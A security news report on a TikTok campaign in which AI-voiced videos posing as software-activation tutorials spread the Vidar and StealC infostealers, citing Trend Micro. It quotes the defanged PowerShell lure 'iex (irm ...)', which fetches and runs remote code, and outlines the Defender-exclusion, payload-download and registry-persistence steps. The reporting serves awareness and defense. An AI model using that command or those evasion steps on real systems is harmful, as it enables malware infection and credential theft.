Cybercriminals have discovered a new frontier for malware distribution by weaponizing TikTok’s massive user base and algorithmic reach.
A sophisticated social engineering campaign has emerged that leverages AI-generated videos to trick users into downloading dangerous information-stealing malware disguised as software activation tutorials.
These deceptive videos promise to help users activate legitimate applications like Windows OS, Microsoft Office, CapCut, and Spotify, but instead deliver the notorious Vidar and StealC infostealers to unsuspecting victims.
The campaign represents a significant evolution in malware distribution tactics, moving away from traditional web-based delivery methods to exploit the trust and engagement inherent in social media platforms.
Unlike conventional attacks that rely on malicious websites or email phishing, this operation embeds all social engineering elements directly within video content, making detection considerably more challenging for security solutions.
The attackers capitalize on TikTok’s viral nature, with one malicious video accumulating nearly 500,000 views, over 20,000 likes, and more than 100 comments, demonstrating the campaign’s alarming reach and effectiveness.
Trend Micro analysts identified multiple TikTok accounts involved in this operation, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771, all of which have since been deactivated.
The researchers noted that these accounts posted strikingly similar faceless videos with AI-generated voices, suggesting an automated production process designed for scalability.
The technical sophistication of the attack becomes apparent in its execution methodology.
Victims are instructed to open PowerShell and execute a seemingly innocuous command: iex (irm hxxps://allaivo[.]me/spotify). This PowerShell script initiates a multi-stage infection process that demonstrates advanced evasion techniques.
Infection Mechanism and Persistence Tactics
The malware’s infection chain reveals carefully orchestrated steps designed to ensure successful compromise while avoiding detection.
.webp)
Upon execution, the initial PowerShell script creates hidden directories within the user’s APPDATA and LOCALAPPDATA folders, immediately adding these locations to Windows Defender’s exclusion list to prevent antivirus scanning.
The script then downloads the primary payload from hxxps://amssh[.]co/file.exe, which contains either Vidar or StealC malware variants.
The persistence mechanism involves downloading an additional PowerShell script from hxxps://amssh[.]co/script[.]ps1 and establishing a registry key that ensures the malware executes at system startup.
Notably, Vidar employs an innovative command-and-control strategy, abusing legitimate services like Steam profiles and Telegram channels as Dead Drop Resolvers to conceal actual C&C server addresses, making detection and takedown efforts significantly more complex.
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
.webp?w=100&resize=100,70&ssl=1 "Top 10 Best Fraud Prevention Companies in 2025")
